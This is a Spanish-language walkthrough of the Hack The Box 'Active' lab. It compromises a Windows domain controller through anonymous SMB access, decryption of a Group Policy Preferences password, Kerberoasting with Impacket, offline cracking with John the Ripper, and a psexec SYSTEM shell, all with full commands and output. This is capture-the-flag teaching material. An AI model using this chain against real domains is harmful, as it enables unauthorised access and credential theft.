Enumeración
La fase de reconocimiento comenzó con un escaneo completo de puertos, revelando un Controlador de Dominio de Windows Server 2008 R2. Los servicios críticos identificados fueron:
- 53/tcp: DNS
- 88/tcp: Kerberos
- 135/tcp: Microsoft RPC
- 139/tcp: NetBIOS
- 389/tcp: LDAP
- 445/tcp: SMB
Al explorar los recursos compartidos de SMB mediante una null session, descubrimos acceso de lectura al recurso Replication. Dentro de este, navegamos por la estructura de las políticas de grupo hasta encontrar el archivo Groups.xml. Este archivo contenía el nombre de usuario SVC_TGS y una contraseña en cpassword, el cual es un hash AES cuya clave de descifrado fue filtrada por Microsoft hace años, permitiéndonos obtener la contraseña en texto claro.
# Añadir active.htb a los host conocidos
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ echo "10.129.24.182 active.htb" | sudo tee -a /etc/hosts
# Comprobar la conexión y el ttl=127 que nos indica que es una máquina Windows
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ ping -c 1 active.htb
PING active.htb (10.129.24.182) 56(84) bytes of data.
64 bytes from active.htb (10.129.24.182): icmp_seq=1 ttl=127 time=103 ms
# [-p-] Escaneo de todos los puertos (65535)
# [--open] Mostrar solo puertos con estado abierto
# [-sS] Stealth SYN Scan para evitar completar la conexión TCP
# [-Pn] No realizar descubrimiento de host mediante ping
# [-n] Desactivar resolución DNS para acelerar el escaneo
# [--min-rate=5000] Enviar paquetes a una tasa mínima de 5000 por segundo
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ sudo nmap -p- --open -sS -Pn -n --min-rate=5000 10.129.24.182 -oG allPorts
# Utilidad para copiar todos los puertos del archivo allPorts
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ extractPorts allPorts
[*] IP Address: 10.129.24.182
[*] Open ports: 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49166,49168
[!] Ports copied to clipboard
# [-sCV] Combinación de -sC (scripts por defecto) y -sV (detección de versiones)
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ sudo nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49166,49168 --min-rate=5000 10.129.24.182 -oN targeted
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-07 10:30:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
...
...
...
49165/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49168/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-01-07T10:31:33
|_ start_date: 2026-01-07T09:21:17
|_clock-skew: 6s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
# Comprobación de servicios SMB y nombre de dominio mediante crackmapexec
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ crackmapexec smb 10.129.24.182
SMB 10.129.24.182 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
# [-L] Listar los recursos compartidos (shares) disponibles en el host
# [-N] Especificar una sesión nula (sin usuario ni contraseña)
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ smbclient -L active.htb -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
# [-H] Especificar el Host objetivo
# [-r] Listar de forma recursiva el contenido del recurso compartido
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ smbmap -H active.htb -r Replication/active.htb/policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
[+] IP: 10.129.24.182:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
./Replicationactive.htb/policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 533 Sat Jul 21 06:38:11 2018 Groups.xml
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
# [--download] Descargar un archivo específico del servidor SMB a la máquina local
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ smbmap -H active.htb --download Replication/active.htb/policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
[+] Starting download: Replication\active.htb\policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml (533 bytes)
[+] File output to: /home/jquirozz/HTB/active/10.129.24.182-Replication_active.htb_policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ cat 10.129.24.182-Replication_active.htb_policies_\{31B2F340-016D-11D2-945F-00C04FB984F9\}_MACHINE_Preferences_Groups_Groups.xml
# <?xml version="1.0" encoding="utf-8"?>
# <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
# name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName=""
# fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
# changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>3 </Groups>Explotación
Con las credenciales del usuario de servicio active.htb\SVC_TGS, validamos el acceso a otros recursos compartidos, logrando obtener la flag de usuario desde su escritorio. Para profundizar en el dominio, utilizamos rpcclient para listar los usuarios y grupos, confirmando que la cuenta de Administrator pertenecía al grupo Domain Admins.
# Herramienta nativa de Kali para descifrar contraseñas de Group Policy Preferences (GPP)
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18
# [-u] Nombre de usuario autenticado
# [-p] Contraseña del usuario
# [-r] Listar recursos compartidos con credenciales válidas
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ smbmap -H active.htb -u "SVC_TGS" -p "GPPstillStandingStrong2k18" -r
[+] IP: 10.129.24.182:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
...
...
...
Users READ ONLY
./Users
dw--w--w-- 0 Sat Jul 21 10:39:20 2018 .
dw--w--w-- 0 Sat Jul 21 10:39:20 2018 ..
dr--r--r-- 0 Mon Jul 16 06:14:21 2018 Administrator
fr--r--r-- 174 Mon Jul 16 17:01:17 2018 desktop.ini
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Public
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 SVC_TGS
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ smbmap -H active.htb -u "SVC_TGS" -p "GPPstillStandingStrong2k18" --download Users/SVC_TGS/Desktop/user.txt
[+] Starting download: Users\SVC_TGS\Desktop\user.txt (34 bytes)
[+] File output to: /home/jquirozz/HTB/active/10.129.24.182-Users_SVC_TGS_Desktop_user.txt
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ cat 10.129.24.182-Users_SVC_TGS_Desktop_user.txt
d5****************************77
# [-U] Especificar usuario y contraseña separados por % para rpcclient
# [-c] Ejecutar un comando específico de rpcclient (enumdomusers = listar usuarios del dominio)
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ rpcclient -U "SVC_TGS%GPPstillStandingStrong2k18" 10.129.24.182 -c "enumdomusers"
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[SVC_TGS] rid:[0x44f]
# [-c] Ejecutar un comando específico (querydispinfo = obtener información de los usuarios)
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ rpcclient -U "SVC_TGS%GPPstillStandingStrong2k18" 10.129.24.182 -c "querydispinfo"
index: 0xdea RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xdeb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xe19 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xeb2 RID: 0x44f acb: 0x00000210 Account: SVC_TGS Name: SVC_TGS Desc: (null)
# [-c] Ejecutar un comando específico (enumdomgroups = listar grupos del dominio)
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ rpcclient -U "SVC_TGS%GPPstillStandingStrong2k18" 10.129.24.182 -c "enumdomgroups"
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
...
...
...
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[DnsUpdateProxy] rid:[0x44e]
# [-c] Ejecutar un comando específico (querygroupmem = listar miembros de un grupo por su RID)
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ rpcclient -U "SVC_TGS%GPPstillStandingStrong2k18" 10.129.24.182 -c "querygroupmem 0x200"
rid:[0x1f4] attr:[0x7]
# [-c] Ejecutar un comando específico (queryuser = obtener información de un usuario por su RID)
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ rpcclient -U "SVC_TGS%GPPstillStandingStrong2k18" 10.129.24.182 -c "queryuser 0x1f4"
User Name : Administrator
Full Name :
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : Built-in account for administering the computer/domain
Workstations:
Comment :
Remote Dial :
Logon Time : Wed, 07 Jan 2026 04:22:39 EST
Logoff Time : Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time : Wed, 31 Dec 1969 19:00:00 EST
Password last set Time : Wed, 18 Jul 2018 15:06:40 EDT
Password can change Time : Thu, 19 Jul 2018 15:06:40 EDT
Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT
unknown_2[0..31]...
user_rid : 0x1f4
group_rid: 0x201
acb_info : 0x00000210
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x0000006e
padding1[0..7]...
logon_hrs[0..21]...Escalada de Privilegios
La escalada a Administrador de Dominio se realizó mediante la técnica de Kerberoasting. Dado que la cuenta Administrator tenía un Service Principal Name (SPN) asociado, pudimos solicitar un ticket de servicio (TGS) cifrado con el hash de su contraseña.
Extrajimos el ticket utilizando GetUserSPNs.py de Impacket y procedimos a realizar un ataque de fuerza bruta offline con john (John the Ripper). Tras obtener la contraseña del administrador, utilizamos psexec.py para obtener una shell con privilegios de SYSTEM, completando el compromiso total del dominio.
# [active.htb/SVC_TGS] Especificar el dominio y el usuario a consultar
# [-no-pass] Intentar obtener el TGT sin proporcionar contraseña (AS-REP Roasting)
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ python3 GetNPUsers.py active.htb/SVC_TGS -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for SVC_TGS
# [active.htb/SVC_TGS:GPP...] Credenciales del usuario que solicita los tickets de servicio
# Este comando lista las cuentas del dominio que tienen SPN asociados y son vulnerables
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ python3 GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2026-01-07 04:22:39.194598
# [-request] Solicitar el ticket TGS al KDC para su posterior cracking offline
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ python3 GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$cf9eecdb7bae2a80647a1954de57145e$36e6da8441768ad6cbcc0c15b0a5964b7295fb952b8f431ea63083b279b53a2a368717adc487d357080a736d1cd99f5f26f68fb45f13c2b928e9663388912f84abdc7f26b6920d9d6bcbb97d12aac9f855262566a1a66dc4d9d6dc10bfe0b8773ac39f7c2d81326970845a158767b586aaae321e5003469a39f09b9855992fe711fab1112ec099603168b6bd266f317a66e17acb8c6a5bc397643edf1a4883bfe00c33724241bc4c109ba5d38cf609165bf0e0e25e8552de54d5759cfb49f3e72081305f35c31f9b998f51f7b13fca5358fd525261fc611c7e8f302f54e67924bac5e99a0b6ccfd01d4078f1166253c9549b3c3a71ee0bdefe866bf564c28a3999023081623cd59b03b453e49999db6d4caef7cbf555fb2d21efce9a21d280f0170ab1825a354a1ca543f4cf5cddb0b0e156c8c07f40869dbea8eb967f73f1d4871501ecf60a3a290a8ebc95cb58b14e878999105104ddf7a6ace4a098b0ce3b66905270f5acc892730171dd31f61b46ff1ac491ae6b01b0a697af10f0cdbae0e1d770617978ad1291442815e129fb1b1885805ab97b5f6797e03604b1c024f2cb76ed21719c24dc510244031f2daa8ebb1ed4ba2064feb2106f1275ed0ddd340c94af662906889cd39f9335878571cd92f2dd8948beb1dcd1a129c06b6c60ba96257e639c13a82a35ef627f34809eb65c7f3f753a64db00a814fd81fd1bd69e96b842cf62f2f99180c3fd9d30004b07c6129731ea443dcd4314a2512fb33e00da6aa72087e7b717125ff27729f328c1614baa5140f56667b9533470bf8c485674e44fed641eeba15a9c79e5862a89f4fff02616bfafe53137b0a59768c1a3682fba531e20b86f930afbefae881a6b136011cebcd933f30a891e51560fbdbe3b693900ae751060d863d1396f4d066c11844a4e6974f06ff6190a0fae743d61a023c393f0047642882cfff1c7cf0ba2f0b719c0a5185cb28a7eaf4268477b307304e8bafcf4610c7cbb9e8f7f70948395451fb53e9f63791482705a962dc98676601e469fe6e3f7f7fd0252703529bcaa210709cdbd7292a58feff0950cb6ea32e802e200b3853def8772edda3b91e37f57c2140ed761c7370f1ddf902dc9ac6e48e429b07ef66fb443a0cf5dc35627cdff54ff28e1170867f43a398454cac32f41f8448070f956fd336e98f4dc6457b9ed6f05fe9e336b37b297a3b9770300a9c6de1fb346de63d695de9285615f08ed90d9aadb2e282f245a4a
# Guardar el ticket en un archivo de texto usando '' para evitar escape de comillas
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ echo '$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$cf9eecdb7bae2a80647a1954de57145e$36e6da8441768ad6cbcc0c15b0a5964b7295fb952b8f431ea63083b279b53a2a368717adc487d357080a736d1cd99f5f26f68fb45f13c2b928e9663388912f84abdc7f26b6920d9d6bcbb97d12aac9f855262566a1a66dc4d9d6dc10bfe0b8773ac39f7c2d81326970845a158767b586aaae321e5003469a39f09b9855992fe711fab1112ec099603168b6bd266f317a66e17acb8c6a5bc397643edf1a4883bfe00c33724241bc4c109ba5d38cf609165bf0e0e25e8552de54d5759cfb49f3e72081305f35c31f9b998f51f7b13fca5358fd525261fc611c7e8f302f54e67924bac5e99a0b6ccfd01d4078f1166253c9549b3c3a71ee0bdefe866bf564c28a3999023081623cd59b03b453e49999db6d4caef7cbf555fb2d21efce9a21d280f0170ab1825a354a1ca543f4cf5cddb0b0e156c8c07f40869dbea8eb967f73f1d4871501ecf60a3a290a8ebc95cb58b14e878999105104ddf7a6ace4a098b0ce3b66905270f5acc892730171dd31f61b46ff1ac491ae6b01b0a697af10f0cdbae0e1d770617978ad1291442815e129fb1b1885805ab97b5f6797e03604b1c024f2cb76ed21719c24dc510244031f2daa8ebb1ed4ba2064feb2106f1275ed0ddd340c94af662906889cd39f9335878571cd92f2dd8948beb1dcd1a129c06b6c60ba96257e639c13a82a35ef627f34809eb65c7f3f753a64db00a814fd81fd1bd69e96b842cf62f2f99180c3fd9d30004b07c6129731ea443dcd4314a2512fb33e00da6aa72087e7b717125ff27729f328c1614baa5140f56667b9533470bf8c485674e44fed641eeba15a9c79e5862a89f4fff02616bfafe53137b0a59768c1a3682fba531e20b86f930afbefae881a6b136011cebcd933f30a891e51560fbdbe3b693900ae751060d863d1396f4d066c11844a4e6974f06ff6190a0fae743d61a023c393f0047642882cfff1c7cf0ba2f0b719c0a5185cb28a7eaf4268477b307304e8bafcf4610c7cbb9e8f7f70948395451fb53e9f63791482705a962dc98676601e469fe6e3f7f7fd0252703529bcaa210709cdbd7292a58feff0950cb6ea32e802e200b3853def8772edda3b91e37f57c2140ed761c7370f1ddf902dc9ac6e48e429b07ef66fb443a0cf5dc35627cdff54ff28e1170867f43a398454cac32f41f8448070f956fd336e98f4dc6457b9ed6f05fe9e336b37b297a3b9770300a9c6de1fb346de63d695de9285615f08ed90d9aadb2e282f245a4a' > hash.txt
# [--format=krb5tgs] Especificar el formato del hash para el ticket de Kerberos 5 TGS
# [-w] Indicar la ruta del diccionario de contraseñas
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ sudo john --format=krb5tgs hash.txt -w=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:04 DONE (2026-01-07 09:46) 0.2352g/s 2479Kp/s 2479Kc/s 2479KC/s Tiffani143..Thrall
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
# Validación final de las credenciales de Administrador con crackmapexec
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ crackmapexec smb 10.129.24.182 -u "Administrator" -p "Ticketmaster1968"
SMB 10.129.24.182 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.24.182 445 DC [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)
# Ejecución remota de comandos para obtener una shell interactiva
# Formato: dominio/usuario:contraseña@IP programa_a_ejecutar
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ python3 psexec.py active.htb/Administrator:Ticketmaster1968@10.129.24.182 cmd.exe
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.129.24.182.....
[*] Found writable share ADMIN$
[*] Uploading file TDZGdrFk.exe
[*] Opening SVCManager on 10.129.24.182.....
[*] Creating service txmt on 10.129.24.182.....
[*] Starting service txmt.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
b9****************************5e